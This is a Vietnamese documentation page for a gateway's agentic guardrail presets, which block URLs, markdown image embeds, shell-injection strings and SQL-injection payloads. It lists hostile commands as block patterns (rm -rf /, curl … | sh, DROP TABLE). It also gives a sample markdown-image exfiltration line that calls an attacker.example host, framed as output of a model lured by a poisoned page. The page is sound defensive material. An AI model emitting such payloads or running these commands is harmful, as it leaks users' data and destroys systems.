Guardrail agentic - OrcaRouter

Khi một mô hình điều khiển tool, các chuỗi nguy hiểm ẩn trong nội dung thuần: một URL agent sắp fetch, một ảnh markdown client sẽ tự nạp, một rm -rf / mô hình dội vào một shell tool, một UNION SELECT nó phát ra cho một SQL runner thực thi. Một chính sách nội dung chỉ nghĩ về PII hoặc secret bỏ lỡ cả bốn. Danh mục preset Agent tồn tại chính xác cho hình dạng này — các quy tắc regex tất định block request hoặc phản hồi trước khi một tool downstream từng hành động trên nó. Đây là trang đích tập trung cho trường hợp dùng agentic. Về engine guardrail hoàn chỉnh — mọi loại quy tắc, trường, giai đoạn, và route — xem tài liệu tham khảo Guardrails.

1. Tại sao guardrail agent là một bề mặt riêng biệt

Một guardrail sàng lọc nội dung — văn bản trong request và văn bản trong phản hồi. Đối với một agent, văn bản đó trở thành một hành động: URL được fetch, markdown được render, dòng shell được chạy, SQL được thực thi. Nên cùng engine block / mask bạn dùng cho PII làm nhiệm vụ kép ở đây — nó chặn một payload tại gateway trước khi lớp tool của agent có thể biến nó thành một hệ quả phụ. Danh mục Agent có bốn preset, mỗi cái một quy tắc regex với hành động block, chia trên hai giai đoạn:

URL Filter — input, block

Block bất kỳ URL http(s) nào trên request. Dùng nó cho các luồng agent nơi URL đi ra ngoài phải được allowlist thay vì mở. Pattern được gieo match bất kỳ URL nào; chỉnh sửa regex để cho phép các domain cụ thể.

Markdown Image Block — output, block

Block các nhúng ảnh markdown (![alt](url)) trong phản hồi của mô hình. Phòng thủ chống exfiltration render-ảnh trên các client tự nạp ảnh từ xa — một kênh rò-dữ-liệu kinh điển nơi một URL ảnh được render lén đưa dữ liệu ra ngoài.

Tool Call Shell Block — input, block

Block các pattern shell-injection rõ ràng trong request (rm -rf /, curl … | sh, wget … | bash, leo thang sudo). Dùng nó cho các luồng agent có thể chuyển tiếp input người dùng vào một shell tool.

SQL Injection in Output — output, block

Block phản hồi mô hình mang theo payload SQL-injection kinh điển (UNION SELECT, OR 1=1, DROP TABLE, các dấu kết thúc comment). Phòng thủ theo chiều sâu cho các tool tự thực thi SQL mà mô hình tạo ra.

Hai preset sàng lọc input, hai sàng lọc output. URL Filter và Tool Call Shell Block kích hoạt trên request — trước khi mô hình chạy, trước khi bất kỳ quota nào được đo. Markdown Image Block và SQL Injection in Output kích hoạt trên phản hồi — sau khi mô hình trả lời, trước khi nội dung đến client hoặc lớp tool của nó. Biết một rủi ro nằm ở giai đoạn nào là cả ván cờ; xem Giai đoạn input và Giai đoạn output.

2. Áp dụng một guardrail agent trong console

Mọi bước ở đây là một hành động console trên gateway được lưu trữ dưới phiên của riêng bạn. Tạo và chỉnh sửa guardrails yêu cầu Developer+ trong workspace. Chỉ cuộc gọi /v1/* cuối cùng dùng một relay key sk-orca-... — bản thân guardrail được cấu hình hoàn toàn trong console.

Mở template

Trong console, mở Guardrails, nhấn split-button New guardrail, và chọn một preset từ danh mục template Agent — ví dụ Markdown Image Block. Nó gieo quy tắc block regex duy nhất ở giai đoạn đúng.

Đặt tên và lưu

Đặt cho nó một tên (≤ 64 ký tự), ví dụ agent-rails, và lưu. Một preset là một hạt giống, không phải một khóa — thêm ba quy tắc Agent còn lại hoặc chỉnh sửa regex tự do sau đó (xem §4).

Test nó trong sandbox

Mở tab Test bên trong editor, dán một mẫu, chọn giai đoạn khớp, và chạy chính sách hiện tại cục bộ — không có cuộc gọi thượng nguồn, không quota (xem §3).

Gắn một key

Chỉnh sửa một API key và chọn agent-rails từ dropdown Guardrail (đặt guardrail_id trên key), hoặc đánh dấu nó là mặc định workspace. Xem Gắn vào một key và Mặc định tài khoản.

3. Chứng minh nó trước khi bạn gắn

Chứng minh quy tắc kích hoạt trước khi bất kỳ key nào trỏ vào nó. Mở tab Test, chọn giai đoạn output, và dán một phản hồi mà một trang bị kẻ tấn công đầu độc có thể đã dụ mô hình phát ra:

Here is the result: ![status](https://attacker.example/track?d=secret)

Sandbox đánh giá chính sách hiện tại cục bộ — không có gì được gửi lên thượng nguồn, không có gì được đo — và trả về verdict block nêu tên quy tắc đã kích hoạt. Để có một lưới A/B đối với một corpus các mẫu đối kháng và lành tính, Eval harness nằm cách một tab.

4. Kết hợp và tinh chỉnh các quy tắc

Bốn preset là hạt giống. Động tác phổ biến là kết hợp chúng thành một guardrail agent-rails và siết chặt mỗi regex theo stack của bạn:

Allowlist URL

Bắt đầu từ URL Filter, rồi chỉnh sửa regex để nó block mọi URL trừ các domain được phê chuẩn của bạn — đảo ngược match thành một allowlist thay vì một block phủ định.

Soạn detector của riêng bạn

Thêm một quy tắc regex cho bất kỳ hình dạng payload nào tool của bạn quan tâm — pattern RE2, thời gian tuyến tính, không backreference. Pattern biên dịch một lần và cache giữa các request.

Trộn các quy tắc Agent với phần còn lại của engine trong một guardrail. Ghép chúng với một quy tắc mask PII Shield hoặc một block input Secrets Blocker — một chính sách có thể mang mọi loại quy tắc và engine gộp chúng thành một verdict duy nhất. Xem Hành động cho block so với mask so với flag.

5. Một block trông như thế nào

Mỗi preset Agent dùng hành động block. Một request bị block trả về HTTP 400 với mã lỗi guardrail_blocked và một thông điệp nêu tên guardrail và quy tắc đã kích hoạt:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

Một request bị block không tốn quota — một block giai đoạn input (URL Filter, Tool Call Shell Block) kích hoạt trước khi đo lường; một block giai đoạn output (Markdown Image Block, SQL Injection in Output) hoàn lại quota đã tiêu trước sau khi phản hồi bị từ chối — và nó được đánh dấu skip-retry, vì chạy lại cùng prompt sẽ chỉ block lại. Xem lỗi guardrail_blocked.

Block output cũng được thực thi trên streaming. Đối với hai preset Agent giai đoạn output, block giữ cả hai hướng: trên một phản hồi non-streaming, câu trả lời được sàng lọc trước khi trả về, và trên một phản hồi streaming, một scanner cắt stream giữa chừng trước khi bất kỳ nội dung bị block nào đến được client. Xem phạm vi streaming.

6. Guardrails là nội dung; firewall là lời gọi tool

Guardrail agent là một lớp đầu tiên mạnh mẽ, nhưng chúng suy luận về chuỗi, không phải ngữ nghĩa tool. Chúng block một dòng shell trong nội dung — chúng không hiểu rằng mô hình đã phát ra một tool_call có cấu trúc tới một tool hủy hoại, hoặc rằng một request đi ra ngoài đang hướng tới một IP metadata. Lớp lời-gọi-tool đó là Firewall: nó đánh giá các tool_calls mô hình phát ra, MCP tools/call, và egress đi ra ngoài với các verdict như allow / audit / deny / pending_approval. Hai cái kết hợp — guardrails sàng lọc văn bản, firewall quản trị hành động.

Firewall

Quản trị các lời gọi tool mô hình phát ra, lời gọi MCP, và egress với các verdict allow / audit / deny / approval.

Guardrails so với Firewall

Khi nào dùng tới một guardrail nội dung so với một firewall lời-gọi-tool — và cách chạy cả hai.

Bảo mật AI agent

Control stack agent đầy đủ: nội dung, tool, MCP, và egress.

Quyền hạn quá mức

Mối đe dọa các rail này giải quyết — một agent làm nhiều hơn nó nên.

7. Xem cái gì đã kích hoạt

Mỗi quy tắc kích hoạt ghi lại một match — loại quy tắc, hành động, giai đoạn, và một chuỗi chi tiết — hiện ra trong feed Matches của workspace. Bản thân chuỗi con đã match được ghi lại chỉ khi Log raw content được bật, mà mặc định tắt. Nhóm và lọc feed theo guardrail, loại quy tắc, và hành động để theo dõi tỷ lệ kích hoạt quy tắc agent của bạn và tinh chỉnh dương tính giả. Xem Matches feed, Logging & quyền riêng tư, và Tinh chỉnh dương tính giả.

8. Đi đâu tiếp theo

Quy tắc giai đoạn output

Cách sàng lọc phản hồi hoạt động cho Markdown Image Block và SQL Injection in Output.

Regex detector

Soạn các pattern RE2 của riêng bạn để mở rộng các quy tắc Agent.

Data exfiltration

Kênh exfil mà Markdown Image Block đóng lại.

Lời gọi tool nguy hiểm

Tại sao một content rail đơn lẻ không đủ — ghép nó với firewall.

Guardrail agent giữ các chuỗi nguy hiểm khỏi nội dung mà một agent gửi và nhận. Để quản trị các hành động một agent thực hiện — bản thân các lời gọi tool, lời gọi MCP, và egress — đi lên Firewall và đọc nền tảng bảo mật AI agent. Về engine guardrail hoàn chỉnh, xem tài liệu tham khảo Guardrails.

​1. Tại sao guardrail agent là một bề mặt riêng biệt

​2. Áp dụng một guardrail agent trong console

​3. Chứng minh nó trước khi bạn gắn

​4. Kết hợp và tinh chỉnh các quy tắc

Allowlist URL

Soạn detector của riêng bạn

​5. Một block trông như thế nào

​6. Guardrails là nội dung; firewall là lời gọi tool

Firewall

Guardrails so với Firewall

Bảo mật AI agent

Quyền hạn quá mức

​7. Xem cái gì đã kích hoạt

​8. Đi đâu tiếp theo

Quy tắc giai đoạn output

Regex detector

Data exfiltration

Lời gọi tool nguy hiểm

1. Tại sao guardrail agent là một bề mặt riêng biệt

2. Áp dụng một guardrail agent trong console

3. Chứng minh nó trước khi bạn gắn

4. Kết hợp và tinh chỉnh các quy tắc

5. Một block trông như thế nào

6. Guardrails là nội dung; firewall là lời gọi tool

7. Xem cái gì đã kích hoạt

8. Đi đâu tiếp theo